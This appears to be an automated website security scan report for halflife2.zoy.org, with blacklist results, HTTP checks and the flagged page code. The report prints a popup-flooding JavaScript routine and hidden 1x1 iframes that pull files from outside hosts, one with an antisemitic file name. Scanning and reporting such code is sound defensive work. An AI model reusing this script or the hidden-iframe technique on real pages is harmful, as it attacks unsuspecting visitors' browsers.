Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=halflife2.zoy.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://halflife2.zoy.org/ | 200 OK Content-Length: 31506 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function shellscript() { for(i = 0; i < 5; i++) { open('http://halflife2.zoy.org/index.php?popup=1','_blank','scrollbar=no'); } } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); setTimeout("main()", 200); } Antivirus reports:
Malicious iFrame found. The same iFrame was found in 3 websites. size: 1x1 src: http://static.nimp.org/lm.pdf This URL is marked by Google as suspicious <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf"> Hidden iFrame found. size: 1x1 src: http://bosslegen.de/~andres/flood.html <iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html"> Malicious iFrame found. size: 1x1 src: http://static.nimp.org/jews.wmv This URL is marked by Google as suspicious <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv"> | ||
http://halflife2.zoy.org/test404page.js | 200 OK Content-Length: 31506 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function shellscript() { for(i = 0; i < 5; i++) { open('http://halflife2.zoy.org/index.php?popup=1','_blank','scrollbar=no'); } } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); setTimeout("main()", 200); } Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://bosslegen.de/~andres/flood.html <iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html"> Malicious iFrame found. size: 1x1 src: http://static.nimp.org/jews.wmv This URL is marked by Google as suspicious <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv"> Malicious iFrame found. The same iFrame was found in 3 websites. size: 1x1 src: http://static.nimp.org/lm.pdf This URL is marked by Google as suspicious <iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: halflife2.zoy.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 16:28:36 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.6.2-1
GET / HTTP/1.1
Host: halflife2.zoy.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 16:28:36 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.6.2-1
Second query (visit from search engine):
GET / HTTP/1.1
Host: halflife2.zoy.org
Referer: http://www.google.com/search?q=halflife2.zoy.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: halflife2.zoy.org
Referer: http://www.google.com/search?q=halflife2.zoy.org
Result:
The result is similar to the first query. There are no suspicious redirects found.